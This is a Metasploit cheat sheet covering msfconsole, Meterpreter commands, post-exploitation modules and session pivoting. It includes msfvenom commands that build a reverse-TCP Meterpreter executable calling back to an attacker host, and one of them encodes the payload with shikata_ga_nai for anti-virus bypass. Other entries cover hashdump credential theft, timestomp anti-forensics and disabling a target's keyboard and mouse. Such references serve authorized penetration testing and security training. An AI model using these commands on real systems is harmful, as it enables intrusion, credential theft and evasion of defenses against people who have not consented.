~/Tools Tips & Tricks/Metasploit#

Meterpreter Post Modules

With an available Meterpreter session, post modules can be run on the target machine.

Post Modules from Meterpreter

meterpreter > run post/multi/gather/env

Post Modules on a Backgrounded Session

msf6 > use post/windows/gather/hashdump
msf6 > show options
msf6 > set SESSION 1
msf6 > run

Useful Auxiliary Modules

Port Scanner:

msf6 > use auxiliary/scanner/portscan/tcp
msf6 > set RHOSTS 10.10.10.0/24
msf6 > run

DNS Enumeration

msf6 > use auxiliary/gather/dns_enum
msf6 > set DOMAIN target.tgt
msf6 > run

FTP Server

msf6 > use auxiliary/server/ftp
msf6 > set FTPROOT /tmp/ftproot
msf6 > run

Proxy Server

msf6 > use auxiliary/server/socks4
msf6 > run

Any proxied traffic that matches the subnet of a route will be routed through the session specified by route. Use proxychains configured for socks4 to route any application’s traffic through a Meterpreter session.

Metasploit Console Basics (msfconsole)

Search for module:

msf6 > search [regex]

Specify and exploit to use:

msf6 > use exploit/[ExploitPath]

Specify a Payload to use:

msf6 > set PAYLOAD [PayloadPath]

Show options for the current modules:

msf6 > show options

Set options:

msf6 > set [Option] [Value]

Start exploit:

msf6 > exploit

Metasploit Meterpreter

Base Commands:

  • ? / help: Display a summary of commands
  • exit / quit: Exit the Meterpreter session
  • sysinfo: Show the system name and OS type
  • shutdown / reboot: Self-explanatory

File System Commands:

  • cd: Change directory
  • lcd: Change directory on local (attacker’s) machine
  • pwd / getwd: Display current working directory
  • ls: Show the contents of the directory
  • cat: Display the contents of a file on screen
  • download / upload: Move files to/from the target machine
  • mkdir / rmdir: Make / remove directory
  • edit: Open a file in the default editor (typically vi)

Msfvenom General

The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run with -l payloads to get a list of payloads.

$ msfvenom -p [PayloadPath] -f [FormatType] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]

Example Reverse Meterpreter payload as an executable and redirected into a file:

$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.10.10 LPORT=4444 > exp.exe

Format Options (specified with -f) --help-formats – List available output formats

  • exe - Executable
  • pl - Perl
  • rb - Ruby
  • raw - Raw shellcode
  • c - C code

Encoding Payloads with msfvenom The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with -l encoders to get a list of encoders.

$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeInterations] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]

Example: Encode a payload from msfpayload 5 times using shikata-ga-nai encoder and output as executable:

$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -fexe LHOST=10.1.10.10 LPORT=4444 > exp.exe

Metasploit Meterpreter (contd)

Process Commands:

  • getpid: Display the process ID that Meterpreter is running inside
  • getuid: Display the user ID that Meterpreter is running with
  • ps: Display process list
  • kill: Terminate a process given its process ID
  • execute: Run a given program with the privileges of the process the Meterpreter is loaded in
  • migrate: Jump to a given destination process ID
  • Target process must have same or lesser privileges
  • Target process may be a more stable process
  • When inside a process, can access any files that process has a lock on

Network Commands:

  • ipconfig: Show network interface information
  • portfwd: Forward packets through TCP session
  • route: Manage/view the system’s routing table

Misc Commands:

  • idletime: Display the duration that the GUI of the target machine has been idle
  • uictl [enable/disable] [keyboard/ mouse]: Enable/disable either the mouse or keyboard of the target machine
  • screenshot: Save as an image a screenshot of the target machine

Additional Modules:

  • use [module]: Load the specified module
  • Example:
    • use priv: Load the priv module
    • hashdump: Dump the hashes from the box
    • timestomp:Alter NTFS file timestamps

Managing Sessions

Multiple Exploitation:

Run the exploit expecting a single session that is immediately backgrounded:

  • msf6 > exploit -z Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
  • msf6 > exploit -j List all current jobs (usually exploit listeners):
  • msf6 > jobs -l

Kill a job:

  • msf6 > jobs -k [JobID]

Multiple Sessions:

List all backgrounded sessions:

  • msf6 > sessions -l Interact with a backgrounded session:
  • msf6 > session -i [SessionID] Background the current interactive session:
  • meterpreter > <Ctrl+Z> or
  • meterpreter > background Routing Through Sessions:

All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session.

  • msf6 > route add [Subnet to Route To] [Subnet Netmask] [SessionID]